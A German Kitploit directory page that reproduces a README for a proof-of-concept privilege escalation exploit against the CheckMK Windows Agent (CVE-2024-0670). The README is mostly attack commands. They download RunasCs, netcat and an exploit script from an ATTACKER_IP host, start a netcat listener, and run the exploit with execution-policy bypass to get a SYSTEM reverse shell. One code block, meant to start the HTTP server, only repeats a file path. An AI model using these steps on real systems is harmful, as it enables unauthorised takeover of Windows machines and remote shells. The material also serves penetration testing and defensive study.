Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — Dieses Repository enthält eine Exploit-Demonstration für CVE-2024-0670, eine lokale Privilegieneskalations-Schwachstelle, die den CheckMK Agent für Windows betrifft. Die Schwachstelle ermöglicht es einem Benutzer mit niedrigen Privilegien, SYSTEM-Privilegien zu erlangen, indem beschreibbare Dateipfade missbraucht werden, die vom MSI-Reparaturmechanismus verarbeitet werden. | Kitploit
Tools/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungBinary-Exploitation
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

Repository anzeigen
3vor 9 MonatenNoch nicht geprüft

Dieses Repository enthält eine Exploit-Demonstration für CVE-2024-0670, eine lokale Privilegieneskalations-Schwachstelle, die den CheckMK Agent für Windows betrifft. Die Schwachstelle ermöglicht es einem Benutzer mit niedrigen Privilegien, SYSTEM-Privilegien zu erlangen, indem beschreibbare Dateipfade missbraucht werden, die vom MSI-Reparaturmechanismus verarbeitet werden.

Teilen

CVE-2024-0670 – CheckMK Agent Lokale Privilegienausweitung (PoC)

Dieses Repository enthält einen einfachen und sauberen Proof-of-Concept für CVE-2024-0670, eine lokale Privilegienausweitungsschwachstelle im CheckMK Windows Agent. Ein Benutzer mit niedrigen Berechtigungen kann SYSTEM-Berechtigungen erlangen, indem er beschreibbare temporäre Dateipfade ausnutzt, die während der MSI-Reparatur ausgeführt werden.

🔍 Zusammenfassung der Schwachstelle

  • Anbieter: Tribe29
  • CVE: CVE-2024-0670
  • Advisory: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

Während einer MSI-Reparatur führt CheckMK Dateien unter folgendem Pfad aus:

root@kitploit:~
  C:\Windows\Temp\

Wenn ein normaler Benutzer dort Dateien mit vorhersagbaren Namen ablegen kann, kann er Befehle als NT AUTHORITY\SYSTEM ausführen.

Dieser Exploit platziert mehrere Payload-Dateinamen und löst die MSI-Reparatur aus, um eine SYSTEM-Ausführung zu erreichen.

📂 Dateien

root@kitploit:~
RunasCs.exe     → runas replacement (plaintext password support)
nc.exe          → Netcat (reverse shell)
exploit.ps1     → CVE-2024-0670 exploit script
README.md       → documentation

🛠 Anforderungen

  • Windows-Benutzer mit niedrigen Berechtigungen
  • PowerShell aktiviert
  • CheckMK Windows Agent installiert
  • Möglichkeit, Dateien herunterzuladen
  • Python (für einfachen HTTP-Server)
  • Netcat-Listener auf dem Angreifer-Rechner

📡 HTTP-Server starten

root@kitploit:~
  C:\Windows\Temp\

📥 Tools auf dem Ziel herunterladen

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 Ausführen des Exploits

Starten Sie einen Listener auf Ihrem Rechner:

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

Bei Erfolg erhalten Sie eine SYSTEM-Reverse-Shell.

🔧 RunasCs manuell erstellen (optional)

root@kitploit:~
net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ Rechtlicher Hinweis

Dieses Projekt dient ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests. Verwenden Sie es nicht für illegale Zwecke. Der Autor übernimmt keine Verantwortung für Missbrauch.

Tool herunterladen